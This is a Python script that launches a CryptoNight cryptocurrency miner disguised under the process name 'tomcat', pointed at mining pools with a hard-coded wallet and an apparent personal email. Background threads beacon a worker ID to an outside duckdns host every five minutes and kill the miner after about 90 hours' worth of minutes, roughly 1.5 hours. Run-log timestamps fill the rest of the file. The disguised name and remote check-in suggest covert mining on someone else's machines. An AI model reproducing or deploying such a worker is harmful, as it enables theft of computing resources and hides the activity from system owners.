import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:23:01.507269
#2018-02-17 17:11:04.909081
#2018-02-17 18:59:03.393291
#2018-02-17 20:48:03.123244
#2018-02-17 22:34:07.586940
#2018-02-18 00:18:01.583869
#2018-02-18 02:08:06.618369
#2018-02-18 03:55:01.531582
#2018-02-18 05:42:03.681655
#2018-02-18 07:34:02.195736
#2018-02-18 09:22:06.033040
#2018-02-18 11:09:07.077615
#2018-02-18 12:56:04.695396
#2018-02-18 14:43:04.868659
#2018-02-18 16:33:04.337674
#2018-02-18 18:22:04.796375
#2018-02-18 20:08:06.787518
#2018-02-18 21:55:06.006513
#2018-02-18 23:44:04.193131
#2018-02-19 01:30:07.136491
#2018-02-19 03:18:08.034131
#2018-02-19 05:03:03.420607
#2018-02-19 06:47:03.680369
#2018-02-19 08:37:05.739985
#2018-02-19 10:26:06.130610
#2018-02-19 12:14:05.908464
#2018-02-19 14:01:09.502433
#2018-02-19 15:50:07.307419
#2018-02-19 17:38:07.939907
#2018-02-19 19:25:06.329873
#2018-02-19 21:11:01.494811
#2018-02-19 22:59:04.340204
#2018-02-20 00:42:01.381084
#2018-02-20 02:32:06.487262
#2018-02-20 04:22:07.623492
#2018-02-20 06:06:01.556550
#2018-02-20 07:50:08.296531
#2018-02-20 09:36:06.195375
#2018-02-20 11:21:03.697788
#2018-02-20 13:07:08.068367
#2018-02-20 14:52:07.021171
#2018-02-20 16:39:04.383576
#2018-02-20 18:25:07.905486
#2018-02-20 20:17:08.144247
#2018-02-20 22:02:05.364276
#2018-02-20 23:44:04.244237
#2018-02-21 01:31:07.128883
#2018-02-21 03:18:01.955878
#2018-02-21 05:06:05.524893
#2018-02-21 06:54:01.700885
#2018-02-21 08:40:01.696458
#2018-02-21 10:26:01.408811
#2018-02-21 12:13:01.730749
#2018-02-21 14:02:01.780642
#2018-02-21 15:46:08.689072
#2018-02-21 17:40:10.759606
#2018-02-21 19:27:02.136267
#2018-02-21 21:16:05.143250
#2018-02-21 23:04:06.315007
#2018-02-22 00:53:06.429702
#2018-02-22 02:41:05.035079
#2018-02-22 04:27:04.036660
#2018-02-22 06:12:06.006088
#2018-02-22 07:58:06.110807
#2018-02-22 09:47:01.359132
#2018-02-22 11:32:08.496205
#2018-02-22 13:18:01.764285
#2018-02-22 15:06:07.599076
#2018-02-22 16:50:11.748383
#2018-02-22 18:38:04.571725
#2018-02-22 20:29:08.342339
#2018-02-22 22:15:01.611070
#2018-02-23 00:01:07.463890
#2018-02-23 01:48:03.999704
#2018-02-23 03:38:01.286591
#2018-02-23 05:22:06.163175
#2018-02-23 07:08:07.053541
#2018-02-23 08:59:04.566133
#2018-02-23 11:06:04.696471
#2018-02-23 13:00:10.013033
#2018-02-23 14:45:06.711899
#2018-02-23 16:35:04.523009
#2018-02-23 18:23:06.089758
#2018-02-23 20:07:03.368675
#2018-02-23 21:57:07.816475
#2018-02-23 23:46:06.489900
#2018-02-24 01:38:05.621201
#2018-02-24 03:26:07.410453
#2018-02-24 05:12:02.285064
#2018-02-24 07:00:07.917813
#2018-02-24 08:50:06.734060
#2018-02-24 10:53:05.868999
#2018-02-24 12:41:03.961477
#2018-02-24 14:29:01.399924
#2018-02-24 16:17:01.997765
#2018-02-24 18:11:01.502435
#2018-02-24 19:56:06.562322
#2018-02-24 21:39:06.942393
#2018-02-25 00:29:06.021485
#2018-02-25 04:07:03.700457
#2018-02-25 07:37:06.945835